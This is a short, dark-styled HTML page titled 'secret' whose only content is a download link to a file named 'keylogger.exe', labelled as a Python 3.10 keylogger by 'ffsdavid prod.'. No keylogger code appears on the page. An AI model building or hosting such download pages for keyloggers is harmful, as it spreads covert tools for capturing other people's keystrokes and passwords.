<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>secret</title>
    <style>
        body {
            font-family: Arial, sans-serif;
            margin: 0;
            padding: 20px;
            text-align: center;
            display: flex;
            flex-direction: column;
            justify-content: center;
            align-items: center;
            height: 100vh;
            background-color: rgb(41, 41, 41);
            color:rgb(150, 150, 150)
        }
        a {
            font-family: Arial, Helvetica, sans-serif;
            font-size: 20px;
            color: #ffffff;
            font-weight: 900;
            text-decoration: none;
            
        }
    </style>
</head>
<body>
    <a href="keylogger.exe">keylogger - py 3.10 (ffsdavid prod.)</a>
</body>
</html>
